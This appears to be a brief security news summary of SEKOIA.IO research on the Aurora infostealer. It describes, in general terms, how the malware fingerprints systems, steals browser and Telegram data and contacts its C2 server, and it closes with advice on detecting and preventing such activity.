On Monday researchers at SEKOIA.IO released a paper detailing their observations and research of Aurora, an infostealer malware that is seeing surging popularity with cybergangs due to its low profile. Originally developed as a botnet in April 2022, sometime between July and September 2022 the malware’s developers pivoted to exclusively operating as an infostealer, advertising its new functionality on Telegram and underground forums. SEKOIA.IO has identified at least 7 gangs that include Aurora as part of their malware lineup, and as a result there are several different documented infection chains distributing the malware.
Aurora initially fingerprints the system using Windows Management Instrumentation Command (WMIC). It then attempts to collect data from browsers, browser extensions, and Telegram, and searches several user directories for interesting files to grab. Once Aurora has completed the information gathering, it sends messages to the Command and Control (C2) server with information formatted in JSON, followed by base64 encoded copies of all of the files identified by the grabber to collect. The final step includes downloading a remote payload and loading it via PowerShell to continue the attack chain.
Companies can detect Aurora and malware like it by implementing command line logging and looking for unusual WMIC and PowerShell commands. Additionally, implementing Canary files can help detect file grabber activity, and user behavioral analysis on netflow data can help detect anomalous network activity, such as connections to strange external ports. Application allowlisting can also help prevent the loader activity seen in Aurora.